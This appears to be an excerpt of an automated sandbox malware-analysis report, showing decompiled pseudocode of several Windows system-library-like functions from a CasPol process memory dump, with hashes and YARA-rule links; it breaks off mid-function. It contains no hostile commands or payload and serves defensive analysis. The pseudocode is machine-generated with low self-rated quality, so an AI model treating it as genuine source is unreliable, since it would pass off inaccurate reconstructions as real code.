                                                                  Function 01473884 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 72%
                                                                  			E01473884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = L01439650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L01414620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = L01439650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















                                                                  0x01473893
                                                                  0x01473896
                                                                  0x01473899
                                                                  0x0147389f
                                                                  0x014738a0
                                                                  0x014738a4
                                                                  0x014738a9
                                                                  0x014738ac
                                                                  0x014738ad
                                                                  0x014738ae
                                                                  0x014738af
                                                                  0x014738b1
                                                                  0x014738b4
                                                                  0x014738bb
                                                                  0x014738bc
                                                                  0x014738bd
                                                                  0x014738c4
                                                                  0x014738c8
                                                                  0x014738ca
                                                                  0x014738ca
                                                                  0x014738d5
                                                                  0x0147393e
                                                                  0x01473940
                                                                  0x01473942
                                                                  0x01473952
                                                                  0x01473954
                                                                  0x01473961
                                                                  0x01473961
                                                                  0x01473967
                                                                  0x0147396e
                                                                  0x0147396e
                                                                  0x01473947
                                                                  0x0147394c
                                                                  0x00000000
                                                                  0x0147394c
                                                                  0x014738ea
                                                                  0x014738ee
                                                                  0x014738f8
                                                                  0x014738f9
                                                                  0x014738ff
                                                                  0x01473900
                                                                  0x01473902
                                                                  0x01473903
                                                                  0x0147390b
                                                                  0x0147390f
                                                                  0x01473950
                                                                  0x00000000
                                                                  0x01473950
                                                                  0x01473915
                                                                  0x0147391d
                                                                  0x0147391d
                                                                  0x01473922
                                                                  0x01473926
                                                                  0x00000000
                                                                  0x01473928
                                                                  0x0147392b
                                                                  0x0147392b
                                                                  0x01473935
                                                                  0x01473937
                                                                  0x01473937
                                                                  0x00000000
                                                                  0x01473935
                                                                  0x01473926
                                                                  0x014738f0
                                                                  0x00000000

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: BinaryName
                                                                  • API String ID: 0-215506332
                                                                  • Opcode ID: 9c28961af260cdd450728874367a84b5d4fb1f31fc3f877bbfcc505cdb5d7db9
                                                                  • Instruction ID: 03bb5f143169c1d2e6e868b0c0de07cf318b2175b57ffc94d21f45acf625095a
                                                                  • Opcode Fuzzy Hash: 9c28961af260cdd450728874367a84b5d4fb1f31fc3f877bbfcc505cdb5d7db9
                                                                  • Instruction Fuzzy Hash: 543105B290150AEFDB15DE59C945DBBBB74FB90B20F01416AE914A73A0D7309E04D7A0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0142D294 Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 33%
                                                                  			E0142D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x14ed360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E01414120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return L0143B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E014398D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E014395D0();
					L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































                                                                  0x0142d29c
                                                                  0x0142d2a6
                                                                  0x0142d2b1
                                                                  0x0142d2b5
                                                                  0x0142d2b6
                                                                  0x0142d2bc
                                                                  0x0142d2bd
                                                                  0x0142d2be
                                                                  0x0142d2bf
                                                                  0x0142d2c2
                                                                  0x0142d2c4
                                                                  0x0142d2cc
                                                                  0x0142d384
                                                                  0x0142d34b
                                                                  0x0142d34f
                                                                  0x0142d350
                                                                  0x0142d351
                                                                  0x0142d35c
                                                                  0x0142d35c
                                                                  0x0142d2d6
                                                                  0x0142d2da
                                                                  0x0142d2e1
                                                                  0x0142d361
                                                                  0x0142d369
                                                                  0x0142d36d
                                                                  0x0142d2e3
                                                                  0x0142d2e3
                                                                  0x0142d2e3
                                                                  0x0142d2e5
                                                                  0x0142d2ed
                                                                  0x0142d2f5
                                                                  0x0142d2fa
                                                                  0x0142d302
                                                                  0x0142d303
                                                                  0x0142d30b
                                                                  0x0142d30f
                                                                  0x0142d313
                                                                  0x0142d318
                                                                  0x0142d31c
                                                                  0x0142d320
                                                                  0x0142d379
                                                                  0x0142d37d
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0146affe
                                                                  0x0146b001
                                                                  0x0146b011
                                                                  0x00000000
                                                                  0x0142d322
                                                                  0x0142d322
                                                                  0x0142d330
                                                                  0x0142d337
                                                                  0x0142d35d
                                                                  0x0142d339
                                                                  0x0142d33f
                                                                  0x0142d38c
                                                                  0x0142d38c
                                                                  0x0142d33f
                                                                  0x0142d349
                                                                  0x00000000
                                                                  0x0142d349

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @
                                                                  • API String ID: 0-2766056989
                                                                  • Opcode ID: 58793c4b78dec229d5bde1734c3a7d03f20bf17192e0922f0b0f722bdcd71dea
                                                                  • Instruction ID: 3fcc6f43a1365a886856e4e41a4e6bd4900f7aadd807d63849392880b14212d7
                                                                  • Opcode Fuzzy Hash: 58793c4b78dec229d5bde1734c3a7d03f20bf17192e0922f0b0f722bdcd71dea
                                                                  • Instruction Fuzzy Hash: 2331BFB29083159FC321DFA9C880A6BBBE8FBD9754F40092FF99483260D634DD45CB92
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 01401B8F Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 72%
                                                                  			E01401B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E0143BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E0143A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E0143A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L01414620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









                                                                  0x01401b8f
                                                                  0x01401b9a
                                                                  0x01401b9c
                                                                  0x01401b9e
                                                                  0x01401ba3
                                                                  0x01457010
                                                                  0x01457010
                                                                  0x00000000
                                                                  0x01401ba9
                                                                  0x01401ba9
                                                                  0x01401bae
                                                                  0x00000000
                                                                  0x01401bc5
                                                                  0x01401bca
                                                                  0x01401bcf
                                                                  0x01401bd0
                                                                  0x01401bd1
                                                                  0x01401bd2
                                                                  0x01401bd6
                                                                  0x01401bdc
                                                                  0x01401be0
                                                                  0x01456ffc
                                                                  0x01457000
                                                                  0x00000000
                                                                  0x01457006
                                                                  0x01457009
                                                                  0x01457009
                                                                  0x01401be6
                                                                  0x01401bec
                                                                  0x01401c0b
                                                                  0x01401c0b
                                                                  0x01401c0c
                                                                  0x01401c11
                                                                  0x01401c12
                                                                  0x01401c15
                                                                  0x01401c1b
                                                                  0x01401c1f
                                                                  0x01401c31
                                                                  0x01401c33
                                                                  0x01457026
                                                                  0x01457026
                                                                  0x01401c21
                                                                  0x01401c24
                                                                  0x01401c24
                                                                  0x01401bee
                                                                  0x01401bee
                                                                  0x01401bf2
                                                                  0x01401c3a
                                                                  0x01401bf4
                                                                  0x01401bf4
                                                                  0x01401c05
                                                                  0x01401c05
                                                                  0x01401c09
                                                                  0x01401c3e
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x01401c09
                                                                  0x01401bec
                                                                  0x01401be0
                                                                  0x01401bae
                                                                  0x01401c2e

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: WindowsExcludedProcs
                                                                  • API String ID: 0-3583428290
                                                                  • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                  • Instruction ID: f571d8d8fa5e30ec05345cc0f6e0826fa4a573354aa0d47ea463e68e267de3db
                                                                  • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                  • Instruction Fuzzy Hash: D121F57A504229ABDB239E5A8840F5BBBADEF94F51F164437FE049B360D630DC0197A0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 014C5BA5 Relevance: .6, Instructions: 592COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 88%
                                                                  			E014C5BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x14d1178);
				E0144D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = L014C4C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E0143D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E014C5542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x14e60e8;
								if( *0x14e60e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x14e60e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E01439710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = L01436DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E0143F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E0143F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E0143F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E0143FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E0143FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E0143F3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E0143F3E0( *(_t528 - 0xb8), _t457, _t506);
